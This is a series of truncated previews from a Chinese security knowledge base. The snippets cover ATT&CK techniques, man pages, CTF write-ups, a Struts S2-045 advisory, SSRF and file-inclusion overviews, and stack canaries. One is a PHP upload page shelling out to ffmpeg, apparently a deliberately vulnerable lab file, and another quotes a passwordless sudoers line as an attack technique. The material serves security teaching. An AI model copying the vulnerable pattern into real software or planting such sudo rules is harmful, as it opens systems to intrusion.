sec-knowleage
# T1583-003-购买基础设施-虚拟专用服务器 ## 来自ATT&CK的描述 攻击者可能会租用虚拟私人服务器(VPS),这些服务器可以在攻击目标期间使用。各种云服务提供商将虚拟机或容器作为一种服务出售。通过利用VPS,攻击者可以使其(追踪)难以在物理上将行动与他们联系起来。使用云计算基础设施也可以使攻击者更容易快速提供、修改和关闭其基础设施。 获取VPS用于攻击生命周期的后期阶段,如指挥和控制,较高声誉、普遍性较强的云服务提供商可以让攻击者获得更多的信任。攻击者也可以从VPS服务提供商那里获得基础设施,这些服务提供商以出租VPS而闻名,其注册信息极少,从而可以更加匿名地获得基础设施。 ## 测试案例 虚拟专用服务器(英语:Vi...
sec-knowleage
.\"{{{}}} .\"{{{ Title .TH INITTAB 5 "May 19, 1998" "" "Linux 系统管理员手册" .\"}}} .\"{{{ Name .SH NAME inittab \- 与 sysv 兼容的 init 进程使用的初始化文件格式 .\"}}} .\"{{{ Description .SH 描述 \fBinittab\fP 文件描述在系统引导及通常的操作期间, 都启动哪些进程 (比如 \& /etc/init.d/boot, /etc/init.d/rc, getty 等等). .BR Init (8) 讨论有关 \fIrunlevels (运行级)\fP 的概念, 每一个 运行级...
sec-knowleage
hostname === 显示和设置系统的主机名 ## 补充说明 **hostname命令** 用于显示和设置系统的主机名称。 - 环境变量 `HOSTNAME` 也保存了当前的主机名。 - 在使用 `hostname` 命令设置主机名后,系统并不会永久保存新的主机名,重启之后还是原来的主机名。如果需要永久修改主机名,需要修改 `/etc/hosts` 和 `/etc/sysconfig/network` 的相关内容并进行重启;也可以使用 `hostnamectl` 命令进行永久修改。 ### 语法 ```shell hostname [-b] {hostname|-F file} 设置主机名称(或从文件获取)...
sec-knowleage
# flagfriendly Web, Medium ## Description > Flags for friendly Kuchenblech http://45.76.92.221:8070/ ```python #!/usr/bin/env python3 import requests from flag import flag from flask import Flask, request, redirect, make_response app = Flask(__name__) @app.route("/", methods=["GET"]) def index(): title = request.ar...
sec-knowleage
.\" You can view this file with: .\" nroff -man [filename] .\" .TH svnadmin 1 .SH NAME svnadmin \- Subversion 仓库管理工具 .SH "SYNOPSIS 总览" .TP \fBsvnadmin\fP \fIcommand\fP \fI/path/to/repos\fP [\fIoptions\fP] [\fIargs\fP] .SH "OVERVIEW 概述" Subversion 是一个版本控制系统,允许保存旧版本的文件和目录 (通常是源代码),保存一个记录何人,何时,为何作出修改等等信息的日志,与 CVS,RCS 或者 S...
sec-knowleage
# S2-045 Remote Code Execution Vulnerablity(CVE-2017-5638) [中文版本(Chinese version)](README.zh-cn.md) Affected Version: Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10 References: - http://struts.apache.org/docs/s2-045.html - https://nsfocusglobal.com/apache-struts2-remote-code-execution-vulnerability-s2-0...
sec-knowleage
7z === 拥有极高压缩比的开源压缩软件。 ## 安装 在 Linux 中输入以下命令安装 7-Zip。 ```bash # Ubuntu 系统 apt-get update apt-get install p7zip-full -y # CentOS 参考:https://linuxconfig.org/how-to-install-p7zip-on-redhat-8 sudo yum install epel-release yum install p7zip p7zip-plugins ``` ## 实例 介绍几个常用场景:解压、压缩、查看(压缩包内容)。 1、将压缩文件 text.7z 在当前目录下解压缩。 ```b...
sec-knowleage
# Canary ## 介绍 Canary 的意思是金丝雀,来源于英国矿井工人用来探查井下气体是否有毒的金丝雀笼子。工人们每次下井都会带上一只金丝雀。如果井下的气体有毒,金丝雀由于对毒性敏感就会停止鸣叫甚至死亡,从而使工人们得到预警。 我们知道,通常栈溢出的利用方式是通过溢出存在于栈上的局部变量,从而让多出来的数据覆盖 ebp、eip 等,从而达到劫持控制流的目的。栈溢出保护是一种缓冲区溢出攻击缓解手段,当函数存在缓冲区溢出攻击漏洞时,攻击者可以覆盖栈上的返回地址来让 shellcode 能够得到执行。当启用栈保护后,函数开始执行的时候会先往栈底插入 cookie 信息,当函数真正返回的时候会验证 cookie 信息是否合法(栈帧...
sec-knowleage
.\" auto-generated by docbook2man-spec $Revision: 1.1 $ .TH "DEALLOCATE" "7" "2003-11-02" "SQL - Language Statements" "SQL Commands" .SH NAME DEALLOCATE \- 删除一个准备好的查询 .SH SYNOPSIS .sp .nf DEALLOCATE [ PREPARE ] \fIplan_name\fR .sp .fi .SH "DESCRIPTION 描述" .PP \fBDEALLOCATE\fR 用于删除前面准备好的查询。 如果你没有明确 DEALLOCATE 一个准备好的查询, ...
sec-knowleage
import sys from itertools import product import ssl, socket def multiply(matr_a, matr_b): """Return product of an MxP matrix A with an PxN matrix B.""" cols, rows = len(matr_b[0]), len(matr_b) resRows = xrange(len(matr_a)) rMatrix = [[0] * cols for _ in resRows] for idx in resRows: for j, ...
sec-knowleage
# Dachshund Attacks Category: Crypto, 80 points ## Description > What if d is too small? ## Solution Let's connect to the attached service: ```console ┌──(user@kali)-[/media/sf_CTFs/pico/Dachshund_Attacks] └─$ nc mercury.picoctf.net 31133 Welcome to my RSA challenge! e: 4018533748822896548308876868936123758065539796935...
sec-knowleage
_ = 1 __ = 2 ___ = 3 ____ = 4 _____ = 5 ______ = 6 _______ = 7 ________ = 8 print(hex(eval("(((_____ << __) + _) << ((((_____ << __) - _) << ____) - _)) - (((((___ << __) - _) << __) + _) << (((((_ << ___) + _)) << _____) + (_ << __))) + (((_______ << _____) - _______) << ((((_ << ____) + _) << ____) + (___ << _))) -...
sec-knowleage
<?php if(!empty($_FILES)) { $filename = escapeshellarg($_FILES['file']['tmp_name']); $newname = './' . uniqid() . '.mp4'; shell_exec("ffmpeg -i $filename $newname"); } ?> <html> <head> <meta charset="utf-8"> <title>Video Player</title> </head> <body> <?php if(!empty($_FILES)): ?> <div> ...
sec-knowleage
.TH VIM 1 "2006-04-11" .SH "名称" vim \- Vi IMproved, 一个程序员的文本编辑器 .SH "概述" .br .B vim [options] [file ..] .br .B vim [options] - .br .B vim [options] \-t tag .br .B vim [options] \-q [errorfile] .PP .br .B ex .br .B view .br .B gvim .B gview .B evim .B eview .br .B rvim .B rview .B rgvim .B rgview .SH "描述" .B Vim 是一个同 Vi...
sec-knowleage
magic = [98,32,84,253,217,18,92,22,112,138,147,46,168,229,31,149,72,94,191,124,21,176,10,104,154,213,235,25,237,61,18,15] target = [3**i for i in range(32)] def solve(t): v2 = 1 v3 = 1 v4 = 1 for i in range(t): v5 = (2*v2 + v3 + 7*v4) % 31337 v4 = v3 v3 = v2 v2 = v5 ...
sec-knowleage
# Kernel Stack Canary Canary 是一种典型的检测机制。在 Linux 内核中,Canary 的实现是与架构相关的,所以这里我们分别从不同的架构来介绍。 ## x86 ### 介绍 在 x86 架构中,同一个 task 中使用相同的 Canary。 ### 发展历史 TODO。 ### 实现 TODO。 ### 使用 #### 开启 在编译内核时,我们可以设置 CONFIG_CC_STACKPROTECTOR 选项,来开启该保护。 #### 关闭 我们需要重新编译内核,并关闭编译选项才可以关闭 Canary 保护。 ### 状态检查 我们可以使用如下方式来检查是否开启了 Canary 保护 1. `chec...
sec-knowleage
# assembly-1 Reversing, 200 points ## Description: > What does asm1(0x255) return? Submit the flag as a hexadecimal value (starting with '0x'). ```assembly .intel_syntax noprefix .bits 32 .global asm1 asm1: push ebp mov ebp,esp cmp DWORD PTR [ebp+0x8],0xea jg part_a cmp DWORD PTR [ebp+0x8],0x8 jne part_b mov ...
sec-knowleage
# JDBC --- Java 中需要调用 JDBC 来对数据库进行操作。 ## JDBC概念 Java 数据库连接,(Java Database Connectivity,简称 JDBC)是 Java 语言中用来规范客户端程序如何来访问数据库的应用程序接口,提供了诸如查询和更新数据库中数据的方法。JDBC 也是 Sun Microsystems 的商标。我们通常说的 JDBC 是面向关系型数据库的。 **JDBC实现原理** Java 通过 java.sql.DriverManager 来管理所有数据库的驱动注册,所以如果想要建立数据库连接需要先在 java.sql.DriverManager 中注册对应的驱动类,然后调用 get...
sec-knowleage
--- title: Reddit date: 2022-11-23 16:23:31.705575 background: bg-[#eb5528] label: tags: - - categories: - Keyboard Shortcuts intro: | A visual cheat-sheet for the 17 keyboard shortcuts found on Reddit.com --- Keyboard Shortcuts ------------------ ### Navigation Shortcut | Action ---|--- `Shift` `?`...
sec-knowleage
# File Inclusion > The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application. > The Path Traversal vulnerability allows an attacker to access a file, usually exploiting a "reading" mechanism implemented in the ta...
sec-knowleage
# T1169-linux-Sudo ## 来自ATT&CK的描述 sudoers文件`/etc/sudoers`描述了哪些用户可以运行哪些命令以及从哪些终端运行。这还描述了用户可以作为其他用户或组运行的命令。这提供了最小特权的概念,使得用户在大多数时间以最低可能的权限运行,并且仅在需要时提升到其他用户或权限,通常通过提示输入密码。但是,sudoers文件还可以指定何时不提示用户输入类似`user1 ALL=(ALL) NOPASSWD: ALL` [[1\]](https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-w...
sec-knowleage
# 溯源案例整理 // TODO ## 国内 [1] 溯源黑帽利用 Web 编辑器漏洞非法植入 SEO 页面事件,SanLorewalker@知道创宇404积极防御实验室,https://paper.seebug.org/1273/#2
sec-knowleage
### SSRF 简介 SSRF,Server-Side Request Forgery,服务端请求伪造,是一种由攻击者构造形成由服务器端发起请求的一个漏洞。一般情况下,SSRF 攻击的目标是从外网无法访问的内部系统。 漏洞形成的原因大多是因为服务端提供了从其他服务器应用获取数据的功能且没有对目标地址作过滤和限制。 攻击者可以利用 SSRF 实现的攻击主要有 5 种: 1. 可以对外网、服务器所在内网、本地进行端口扫描,获取一些服务的 banner 信息 2. 攻击运行在内网或本地的应用程序(比如溢出) 3. 对内网 WEB 应用进行指纹识别,通过访问默认文件实现 4. 攻击内外网的 web 应用,主要是使用 GET 参数就...
sec-knowleage
import math, string # Read raw data. data=open("keysound1_ampl.wav","rb").read()[44:] samples=[] for i in range(len(data)/2): smp=ord(data[i*2+1])*256+ord(data[i*2]) if smp>=256*256/2: smp-=256*256 samples.append(smp) print "Got samples from file..." RAVG=400 # Running average length THR=4600 # T...
sec-knowleage